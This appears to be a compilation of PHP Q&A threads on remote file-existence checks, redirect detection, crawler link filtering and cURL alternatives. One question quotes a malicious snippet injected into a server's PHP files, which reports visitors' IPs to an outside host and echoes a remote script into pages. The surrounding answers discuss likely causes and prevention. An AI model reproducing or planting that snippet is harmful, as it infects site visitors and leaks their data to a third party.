Is there a better way to check whether a file exists (it is on a different domain, so file_exists() won't work) than this?
$fp = fsockopen($fileUri, 80, $errno, $errstr, 30); // note: fsockopen() expects a hostname, not a full URI
if ($fp) {
    // connected -- but this only proves the host is up, not that the file exists
    fclose($fp);
}
I do it like this; it always works fine:
$url = "http://www.example.com/index.php";
$header_response = get_headers($url, 1);
if ( strpos( $header_response[0], "404" ) !== false )
{
// FILE DOES NOT EXIST
}
else
{
// FILE EXISTS!!
}
See the get_headers() example and the explanations above, or:
file_get_contents("http://example.com/path/to/image.gif", false, null, 0, 1);
Set the maxlen parameter to 1 so only a single byte is downloaded.
You could use curl and check the headers for a response code.
This question has a few examples you could use.
When using curl, use curl_setopt to switch CURLOPT_NOBODY to true so that it only downloads the headers and not the full file. E.g. curl_setopt($ch, CURLOPT_NOBODY, true);
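For instance, a minimal sketch of that approach (the URL is illustrative):
<?php
// Probe with curl: fetch headers only, then check the response code.
$ch = curl_init('http://www.example.com/index.php');
curl_setopt($ch, CURLOPT_NOBODY, true);         // headers only, no body
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); // don't echo the response
curl_exec($ch);
$code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($code == 200) {
    // file exists
}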
From http://www.php.net/manual/en/function.fopen.php#98128
function http_file_exists($url)
{
    $f = @fopen($url, "r");
    if ($f)
    {
        fclose($f);
        return true;
    }
    return false;
}
All my tests show that it works as expected.
I would use curl to check the headers for this and validate the content type.
Something like:
function ExternalFileExists($location, $misc_content_type = false)
{
    $curl = curl_init($location);
    curl_setopt($curl, CURLOPT_NOBODY, true);
    curl_setopt($curl, CURLOPT_HEADER, true);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true); // don't echo the headers
    curl_exec($curl);
    $info = curl_getinfo($curl);
    curl_close($curl);
    if ((int)$info['http_code'] >= 200 && (int)$info['http_code'] <= 206)
    {
        //Response says ok.
        if ($misc_content_type !== false)
        {
            // strpos() can legitimately return 0, so compare strictly
            return strpos($info['content_type'], $misc_content_type) !== false;
        }
        return true;
    }
    return false;
}
And then you can use like so:
if(ExternalFileExists('http://server.com/file.avi','video'))
{
}
or, if you're unsure about the extension:
if(ExternalFileExists('http://server.com/file.ext'))
{
}
What about:
<?php
$a = @file_get_contents('http://mydomain.com/test.html');
if ($a !== false) echo('exists'); else echo('does not exist');
Last week we had a problem on our server where code was injected into PHP files. I was wondering what the cause of this could have been. The code snippet that was injected into our files looked something like this:
#be7339#
if (empty($qjqb))
{
    error_reporting(0);
    @ini_set('display_errors', 0);
    if (!function_exists('__url_get_contents'))
    {
        function __url_get_contents($remote_url, $timeout)
        {
            if (function_exists('curl_exec'))
            {
                $ch = curl_init();
                curl_setopt($ch, CURLOPT_URL, $remote_url);
                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
                curl_setopt($ch, CURLOPT_TIMEOUT, $timeout); //timeout in seconds
                $_url_get_contents_data = curl_exec($ch);
                curl_close($ch);
            }
            elseif (function_exists('file_get_contents') && ini_get('allow_url_fopen'))
            {
                $ctx = @stream_context_create(array('http' => array('timeout' => $timeout,)));
                $_url_get_contents_data = @file_get_contents($remote_url, false, $ctx);
            }
            elseif (function_exists('fopen') && function_exists('stream_get_contents'))
            {
                $handle = @fopen($remote_url, "r");
                $_url_get_contents_data = @stream_get_contents($handle);
            }
            else
            {
                $_url_get_contents_data = __file_get_url_contents($remote_url);
            }
            return $_url_get_contents_data;
        }
    }
    if (!function_exists('__file_get_url_contents'))
    {
        function __file_get_url_contents($remote_url)
        {
            if (preg_match('/^([a-z]+):\/\/([a-z0-9-.]+)(\/.*$)/i', $remote_url, $matches))
            {
                $protocol = strtolower($matches[1]);
                $host = $matches[2];
                $path = $matches[3];
            }
            else
            {
                // Bad remote_url-format
                return FALSE;
            }
            if ($protocol == "http")
            {
                $socket = @fsockopen($host, 80, $errno, $errstr, $timeout);
            }
            else
            {
                // Bad protocol
                return FALSE;
            }
            if (!$socket)
            {
                // Error creating socket
                return FALSE;
            }
            $request = "GET $path HTTP/1.0\r\nHost: $host\r\n\r\n";
            $len_written = @fwrite($socket, $request);
            if ($len_written === FALSE || $len_written != strlen($request))
            {
                // Error sending request
                return FALSE;
            }
            $response = "";
            while (!@feof($socket) && ($buf = @fread($socket, 4096)) !== FALSE)
            {
                $response .= $buf;
            }
            if ($buf === FALSE)
            {
                // Error reading response
                return FALSE;
            }
            $end_of_header = strpos($response, "\r\n\r\n");
            return substr($response, $end_of_header + 4);
        }
    }
    if (empty($__var_to_echo) && empty($remote_domain))
    {
        $_ip = $_SERVER['REMOTE_ADDR'];
        $qjqb = "http://pleasedestroythis.net/L3xmqGtN.php";
        $qjqb = __url_get_contents($qjqb . "?a=$_ip", 1);
        if (strpos($qjqb, 'http://') === 0)
        {
            $__var_to_echo = '<script type="text/javascript" src="' . $qjqb . '?id=13028308"></script>';
            echo $__var_to_echo;
        }
    }
}
I would like to ask how this could have happened, and how to prevent it in the future.
Thanks in advance.
Script (PHP) code injection usually means that someone has gotten hold of the password(s) to your hosting account. At the very minimum scan your PCs for spyware and viruses, and then change your passwords. Use SSL when connecting to your hosting account control panel, if possible. Be careful about using FTP, as it sends passwords in the clear. See if your host supports a more secure file transfer method.
The most common way this happens is that you have a script that allows file uploads. If the script does not validate what file is uploaded, a malicious user could upload a PHP file.
If your upload folder allows parsing of PHP files, the user could then run that PHP file in the browser. It could be some sort of file explorer, which would show the user all the files on your server. If any files have loose permissions, the user could easily edit them to include the extra code you are seeing.
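For illustration, a minimal sketch of the kind of upload validation that helps (the form field name and the whitelist are hypothetical):
// Reject uploads whose extension is not explicitly whitelisted.
$allowed = array('jpg', 'png', 'gif', 'pdf');
$ext = strtolower(pathinfo($_FILES['upload']['name'], PATHINFO_EXTENSION));
if (!in_array($ext, $allowed, true)) {
    die('File type not allowed');
}
// Also consider storing uploads outside the web root, or disabling
// PHP execution in the upload folder.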
Usually it's because somebody else got access to your FTP, or because you allow uploading of PHP files.
You should look into your other files as well, because there could be other code that keeps adding those lines to your files (just a guess, based on the "#be7339#" marker at the beginning).
What is the Apache version on your server? This problem can come from using an outdated version. Look at this link about security vulnerabilities in old Apache 2.0 versions:
http://httpd.apache.org/security/vulnerabilities_20.html
Is there an alternative to file_get_contents? This is the code I'm having issues with:
if (!$img = file_get_contents($imgurl)) {
    $error[] = "Couldn't find the file named $card.$format at $defaultauto";
} else {
    if (!file_put_contents($filename, $img)) {
        $error[] = "Failed to upload $filename";
    } else {
        $success[] = "All missing cards have been uploaded";
    }
}
I tried using cURL but couldn't quite figure out how to accomplish what this is accomplishing. Any help is appreciated!
There are many alternatives to file_get_contents; I've posted a couple below.
fopen
function fOpenRequest($url) {
$file = fopen($url, 'r');
$data = stream_get_contents($file);
fclose($file);
return $data;
}
$fopen = fOpenRequest('https://www.example.com');// This returns the data using fopen.
curl
function curlRequest($url) {
$c = curl_init();
curl_setopt($c, CURLOPT_URL, $url);
curl_setopt($c, CURLOPT_RETURNTRANSFER, true);
$data = curl_exec($c);
curl_close($c);
return $data;
}
$curl = curlRequest('https://www.example.com');// This returns the data using curl.
You could use one of these available options, with the data stored in a variable, to perform whatever you need.
I am writing a PHP program that downloads a pdf from a backend and saves it to a local drive. Now how do I check whether the file exists before downloading?
Currently I am using curl (see code below) to check and download, but it still creates a file (about 1 KB in size) even when the remote file is missing.
$url = "http://wedsite/test.pdf";
$path = "C:\\test.pdf;"
downloadAndSave($url,$path);
function downloadAndSave($urlS,$pathS)
{
$fp = fopen($pathS, 'w');
$ch = curl_init($urlS);
curl_setopt($ch, CURLOPT_FILE, $fp);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
echo $httpCode;
//If 404 is returned, then file is not found.
if(strcmp($httpCode,"404") == 1)
{
echo $httpCode;
echo $urlS;
}
fclose($fp);
}
I want to check whether the file exists before even downloading. Any idea how to do it?
You can do this with a separate curl HEAD request:
curl_setopt($ch, CURLOPT_NOBODY, true);
$data = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
When you actually want to download, you can set NOBODY back to false.
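A sketch of that two-step flow, assuming the $ch handle from above and an open file handle $fp:
// Probe first with a header-only request; download only on success.
curl_setopt($ch, CURLOPT_NOBODY, true);
curl_exec($ch);
if (curl_getinfo($ch, CURLINFO_HTTP_CODE) == 200) {
    curl_setopt($ch, CURLOPT_NOBODY, false); // now fetch the body
    curl_setopt($ch, CURLOPT_FILE, $fp);     // and write it to the file
    curl_exec($ch);
}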
Call this before your download function and it's done:
<?php
function remoteFileExists($url) {
$curl = curl_init($url);
//don't fetch the actual page, you only want to check the connection is ok
curl_setopt($curl, CURLOPT_NOBODY, true);
//do request
$result = curl_exec($curl);
$ret = false;
//if request did not fail
if ($result !== false) {
//if request was ok, check response code
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
if ($statusCode == 200) {
$ret = true;
}
}
curl_close($curl);
return $ret;
}
?>
Since you are using HTTP to fetch a resource on the internet, what you really want to check is whether the response code is a 404.
On some PHP installations, you can just use file_exists($url) out of the box. This does not work in all environments, however. http://www.php.net/manual/en/wrappers.http.php
Here is a function much like file_exists() but for URLs, using get_headers():
<?php
function remote_file_exists($url) {
    $file_headers = @get_headers($url);
    if ($file_headers[0] == 'HTTP/1.1 404 Not Found') {
        $exists = false;
    }
    else {
        $exists = true;
    }
    return $exists;
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#75064
Sometimes the CURL extension isn't installed with PHP. In that case you can still use the socket library in the PHP core:
<?php
function url_exists($url) {
    $a_url = parse_url($url);
    if (!isset($a_url['port'])) $a_url['port'] = 80;
    $errno = 0;
    $errstr = '';
    $timeout = 30;
    if (isset($a_url['host']) && $a_url['host'] != gethostbyname($a_url['host'])) {
        $fid = fsockopen($a_url['host'], $a_url['port'], $errno, $errstr, $timeout);
        if (!$fid) return false;
        $page = isset($a_url['path']) ? $a_url['path'] : '';
        $page .= isset($a_url['query']) ? '?' . $a_url['query'] : '';
        fputs($fid, 'HEAD ' . $page . ' HTTP/1.0' . "\r\n" . 'Host: ' . $a_url['host'] . "\r\n\r\n");
        $head = fread($fid, 4096);
        $head = substr($head, 0, strpos($head, 'Connection: close'));
        fclose($fid);
        // accept 200 or 302 status lines
        if (preg_match('#^HTTP/.*\s+(200|302)\s#i', $head)) {
            $pos = strpos($head, 'Content-Type');
            return $pos !== false;
        }
        return false;
    } else {
        return false;
    }
}
?>
source: http://www.php.net/manual/en/function.file-exists.php#73175
An even faster function can be found here:
http://www.php.net/manual/en/function.file-exists.php#76246
In the first example above, $file_headers[0] may contain more than, or something other than, 'HTTP/1.1 404 Not Found', e.g.:
HTTP/1.1 404 Document+%2Fdb%2Fscotbiz%2Freports%2FR20131212%2Exml+not+found
So it's important to use some other test, e.g. a regex, as '==' is not reliable.
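For example, a status-line test along these lines (a sketch; it assumes an HTTP/1.x status line):
// Pull the status code out of the status line instead of comparing the whole string.
$file_headers = @get_headers($url);
if ($file_headers && preg_match('#^HTTP/\S+\s+404\b#', $file_headers[0])) {
    // FILE DOES NOT EXIST
}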
I'm working on a little webcrawler as a side project at the moment, basically having it collect all hrefs on a page and then parse those. My problem is:
How can I only get the actual page results? At the moment I'm using the following:
foreach ($page->getElementsByTagName('a') as $link)
{
    $compare_url = parse_url($link->getAttribute('href'));
    if (@$compare_url['host'] == "")
    {
        $links[] = 'http://' . @$base_url['host'] . '/' . $link->getAttribute('href');
    }
    elseif (@$base_url['host'] == @$compare_url['host'])
    {
        $links[] = $link->getAttribute('href');
    }
}
As you can see, this will bring in jpegs, exe files, etc. I only need to pick up web pages like .php, .html, .asp, etc.
I'm not sure if there is some function able to work this out, or if it will need a regex against some sort of master list?
Thanks
Since the URL string alone isn't connected to the resource behind it in any way, you will have to go out and ask the webserver about it. For this there's an HTTP method called HEAD, so you won't have to download everything.
You can implement this with curl in PHP like this:
function curl_head($url) {
    $curl = curl_init($url);
    curl_setopt($curl, CURLOPT_NOBODY, true);
    curl_setopt($curl, CURLOPT_HEADER, true);
    curl_setopt($curl, CURLOPT_MAXREDIRS, 5);
    curl_setopt($curl, CURLOPT_FOLLOWLOCATION, true);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_1);
    $content = curl_exec($curl);
    curl_close($curl);
    // redirected heads just pile up one after another
    $parts = explode("\r\n\r\n", trim($content));
    // return only the last one
    return end($parts);
}

function is_html($url) {
    $header = curl_head($url);
    // look for the content-type part of the header response
    return preg_match('/content-type\s*:\s*text\/html/i', $header);
}

var_dump(is_html('http://github.com'));
This version only accepts text/html responses and doesn't check whether the response is a 404 or another error (however, it follows redirects up to 5 jumps). You can tweak the regexp or add some error handling, either from the curl response or by matching against the header string's first line.
Note: webservers will run scripts behind these URLs to give you responses. Be careful not to overload hosts with probing, or to grab "delete" or "unsubscribe" type links.
To check whether a page has a valid extension (html, php, ...), use this function:
function check($url) {
    $extensions = array("php", "html"); //Add extensions here
    foreach ($extensions as $ext) {
        if (substr($url, -(strlen($ext) + 1)) == "." . $ext) {
            return 1;
        }
    }
    return 0;
}
foreach ($page->getElementsByTagName('a') as $link) {
    $compare_url = parse_url($link->getAttribute('href'));
    if (@$compare_url['host'] == "") {
        if (check($link->getAttribute('href'))) {
            $links[] = 'http://' . @$base_url['host'] . '/' . $link->getAttribute('href');
        }
    }
    elseif (@$base_url['host'] == @$compare_url['host']) {
        if (check($link->getAttribute('href'))) {
            $links[] = $link->getAttribute('href');
        }
    }
}
Consider using preg_match to check the type of the link (application, picture, html file), and depending on the result decide what to do.
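For instance, a sketch of the preg_match route (the extension list is illustrative):
// Keep only links whose path ends in a page-like extension.
function looks_like_page($url)
{
    $path = (string) parse_url($url, PHP_URL_PATH);
    return (bool) preg_match('#\.(php|html?|aspx?)$#i', $path);
}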
Another (simpler) option is to use explode and take the last piece of the URL after the final . (the extension).
For instance:
//If the URL has any one of the following extensions, ignore it.
$forbid_ext = array('jpg', 'gif', 'exe');

foreach ($page->getElementsByTagName('a') as $link) {
    $compare_url = parse_url($link->getAttribute('href'));
    if (@$compare_url['host'] == "")
    {
        if (check_link_type($link->getAttribute('href')))
            $links[] = 'http://' . @$base_url['host'] . '/' . $link->getAttribute('href');
    }
    elseif (@$base_url['host'] == @$compare_url['host'])
    {
        if (check_link_type($link->getAttribute('href')))
            $links[] = $link->getAttribute('href');
    }
}

function check_link_type($url)
{
    global $forbid_ext;
    $parts = explode(".", $url); // end() needs a variable, not an expression
    $ext = end($parts);
    if (in_array($ext, $forbid_ext))
        return false;
    return true;
}
UPDATE (instead of checking 'forbidden' extensions, let's look for good ones)
$good_ext = array('html', 'php', 'asp');

function check_link_type($url)
{
    global $good_ext;
    $parts = explode(".", $url);
    $ext = end($parts);
    // treat extensionless URLs as pages; otherwise require a whitelisted extension
    if ($ext == "" || in_array($ext, $good_ext))
        return true;
    return false;
}
I have implemented a function that runs on each page that I want to restrict from non-logged-in users. The function automatically redirects the visitor to the login page if he or she is not logged in.
I would like to make a PHP function that runs from an external server and iterates through a number of set URLs (an array with the URL of each protected page) to see whether they are redirected or not. That way I could easily make sure the protection is up and running on every page.
How could this be done?
Thanks.
$urls = array(
'http://www.apple.com/imac',
'http://www.google.com/'
);
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
foreach($urls as $url) {
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
// line endings is the wonkiest piece of this whole thing
$out = str_replace("\r", "", $out);
// only look at the headers
$headers_end = strpos($out, "\n\n");
if( $headers_end !== false ) {
$out = substr($out, 0, $headers_end);
}
$headers = explode("\n", $out);
foreach($headers as $header) {
if( substr($header, 0, 10) == "Location: " ) {
$target = substr($header, 10);
echo "[$url] redirects to [$target]<br>";
continue 2;
}
}
echo "[$url] does not redirect<br>";
}
I use curl and fetch only the headers; afterwards I compare my URL with the final URL that curl reports:
$url="http://google.com";
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_TIMEOUT, '60'); // in seconds
curl_setopt($ch, CURLOPT_HEADER, 1);
curl_setopt($ch, CURLOPT_NOBODY, 1);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$res = curl_exec($ch);
if(curl_getinfo($ch)['url'] == $url){
echo "not redirect";
}else {
echo "redirect";
}
You could always try adding:
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
since 302 means it moved, this allows the curl call to follow it and return whatever the destination URL returns.
Getting the headers with get_headers() and checking if Location is set is much simpler.
$urls = [
"https://example-1.com",
"https://example-2.com"
];
foreach ($urls as $key => $url) {
$is_redirect = does_url_redirect($url) ? 'yes' : 'no';
echo $url . ' is redirected: ' . $is_redirect . PHP_EOL;
}
function does_url_redirect($url){
$headers = get_headers($url, 1);
if (!empty($headers['Location'])) {
return true;
} else {
return false;
}
}
I'm not sure whether this really makes sense as a security check.
If you are worried about files getting called directly without your "is the user logged in?" checks being run, you could do what many big PHP projects do: In the central include file (where the security check is being done) define a constant BOOTSTRAP_LOADED or whatever, and in every file, check for whether that constant is set.
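A minimal sketch of that pattern (the constant name is illustrative):
// bootstrap.php: runs the login check, then marks itself as loaded.
define('BOOTSTRAP_LOADED', true);

// top of every protected file:
if (!defined('BOOTSTRAP_LOADED')) {
    die('No direct access');
}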
Testing is great and security testing is even better, but I'm not sure what kind of flaw you are looking to uncover with this? To me, this idea feels like a waste of time that will not bring any real additional security.
Just make sure your script calls die() after the header("Location: ...") redirect. That is essential to stop additional content from being displayed after the header command (a missing die() wouldn't be caught by your idea, by the way, as the redirect header would still be issued...)
If you really want to do this, you could also use a tool like wget and feed it a list of URLs. Have it fetch the results into a directory, and check (e.g. by looking at the file sizes that should be identical) whether every page contains the login dialog. Just to add another option...
Do you want to check the HTTP code to see if it's a redirect?
$params = array('http' => array(
'method' => 'HEAD',
'ignore_errors' => true
));
$context = stream_context_create($params);
foreach(array('http://google.com', 'http://stackoverflow.com') as $url) {
$fp = fopen($url, 'rb', false, $context);
$result = stream_get_contents($fp);
if ($result === false) {
throw new Exception("Could not read data from {$url}");
} else if (! strstr($http_response_header[0], '301')) {
// Do something here
}
}
I hope it will help you:
function checkRedirect($url)
{
    $headers = get_headers($url, 1);
    if ($headers && isset($headers[0])) {
        if (strpos($headers[0], '302') !== false && isset($headers['Location'])) {
            //this is the URL where it's redirecting;
            //with get_headers($url, 1) the Location header is keyed by name
            $location = $headers['Location'];
            return is_array($location) ? end($location) : $location;
        }
    }
    return false;
}
$isRedirect = checkRedirect($url);
if(!$isRedirect )
{
echo "URL Not Redirected";
}else{
echo "URL Redirected to: ".$isRedirect;
}
You can use a session: if the session variable is not set, redirect the URL to the login page.
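A minimal sketch of that check (the session key is illustrative):
// Redirect anonymous visitors to the login page.
session_start();
if (empty($_SESSION['logged_in'])) {
    header('Location: /login.php');
    exit; // stop, so protected content below is never sent
}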
I modified Adam Backstrom's answer and implemented chiborg's suggestion (download only the HEAD). It does one thing more: it checks whether the redirect points to a page on the same server or somewhere external. Example: terra.com.br redirects to terra.com.br/portal. PHP will consider that a redirect, which is correct, but I only wanted to list URLs that redirect to a different host.
function RedirectURL() {
    $urls = array('http://www.terra.com.br/', 'http://www.areiaebrita.com.br/');
    foreach ($urls as $url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_HEADER, true);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        // chiborg suggestion: fetch only the headers
        curl_setopt($ch, CURLOPT_NOBODY, true);
        curl_setopt($ch, CURLOPT_URL, $url);
        $out = curl_exec($ch);
        // line endings is the wonkiest piece of this whole thing
        $out = str_replace("\r", "", $out);
        $headers = explode("\n", $out);
        foreach ($headers as $header) {
            if (substr(strtolower($header), 0, 9) == "location:") {
                // Check whether the redirect stays on the same server or leaves it.
                // terra.com.br redirects to terra.com.br/portal: that is valid.
                // areiaebrita.com.br redirects to bwnet.com.br: that is what we
                // want to report. Some servers redirect to a folder by citing
                // only the folder (e.g. net11.com.br redirects to /heiden), so
                // only absolute Location headers containing "http" are checked.
                if (strpos(strtolower($header), "http") !== false) {
                    $location = trim(substr($header, 9));
                    $redirect_host = strtolower(parse_url($location, PHP_URL_HOST));
                    $original_host = strtolower(parse_url($url, PHP_URL_HOST));
                    // if the original host is still part of the redirect host,
                    // the server did not send us away
                    if (strpos($redirect_host, $original_host) !== false) {
                        echo "URL NOT REDIRECT";
                    } else {
                        // not the same host (areiaebrita)
                        echo "SORRY, URL REDIRECT WAS FOUND: " . $url;
                    }
                }
            }
        }
    }
}
function unshorten_url($url){
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_URL, $url);
$out = curl_exec($ch);
$real_url = $url;//default.. (if no redirect)
if (preg_match("/location: (.*)/i", $out, $redirect))
$real_url = $redirect[1];
if (strstr($real_url, "bit.ly"))//the redirect is another shortened url
$real_url = unshorten_url($real_url);
return $real_url;
}
I have just made a function that checks if a URL exists or not
$ch = curl_init();
curl_setopt($ch, CURLOPT_HEADER, true);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
function url_exists($url, $ch) {
    curl_setopt($ch, CURLOPT_URL, $url);
    $out = curl_exec($ch);
    // line endings is the wonkiest piece of this whole thing
    $out = str_replace("\r", "", $out);
    // only look at the headers
    $headers_end = strpos($out, "\n\n");
    if ($headers_end !== false) {
        $out = substr($out, 0, $headers_end);
    }
    $headers = explode("\n", $out);
    foreach ($headers as $header) {
        if (strpos($header, 'HTTP/1.1 200 OK') !== false) {
            return true;
        }
    }
    return false; // no 200 status line was found
}
Now I have used an array of URLs to check if a URL exists as following:
$my_url_array = array('http://howtocode.pk/result', 'http://google.com/jobssss', 'https://howtocode.pk/javascript-tutorial/', 'https://www.google.com/');
for($j = 0; $j < count($my_url_array); $j++){
if(url_exists($my_url_array[$j], $ch)){
echo 'This URL "'.$my_url_array[$j].'" exists. <br>';
}
}
I can't quite understand your question.
You have an array of URLs and you want to know whether the user came from one of them?
If I'm understanding you correctly:
$urls = array('http://url1.com','http://url2.ru','http://url3.org');
if(in_array($_SERVER['HTTP_REFERER'],$urls))
{
echo 'FROM ARRAY';
} else {
echo 'NOT FROM ARR';
}
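Note that HTTP_REFERER is supplied by the client and can be empty or spoofed, so don't rely on it as a security check.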